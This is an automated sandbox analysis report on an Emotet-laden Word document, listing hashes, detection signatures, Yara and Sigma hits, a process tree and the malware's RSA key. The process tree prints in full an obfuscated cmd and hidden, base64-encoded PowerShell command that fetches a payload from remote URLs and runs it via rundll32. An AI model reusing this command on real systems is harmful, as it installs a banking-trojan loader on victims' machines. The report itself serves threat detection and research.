Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 79a2gzs3gkk.doc

Overview

General Information

Sample Name:79a2gzs3gkk.doc
Analysis ID:343551
MD5:09a4d7bbb0db4003f6d6eee258f0ae48
SHA1:b611b372dc40c114d2fb52cf967ffb9062728372
SHA256:df5ff0dd34808825942b6b896c5129f63bc36f8fbbba7f3ce145cced467c662a

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1552 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2556 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 620 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • rundll32.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 1928 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2452 cmdline: powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2724 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2696 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2432 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2512 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 3016 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 268 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2504 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2556 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.rundll32.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              12.2.rundll32.exe.10000000.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                8.2.rundll32.exe.10000000.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  11.2.rundll32.exe.190000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    16.2.rundll32.exe.210000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 79 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2696, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, ProcessId: 824
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBW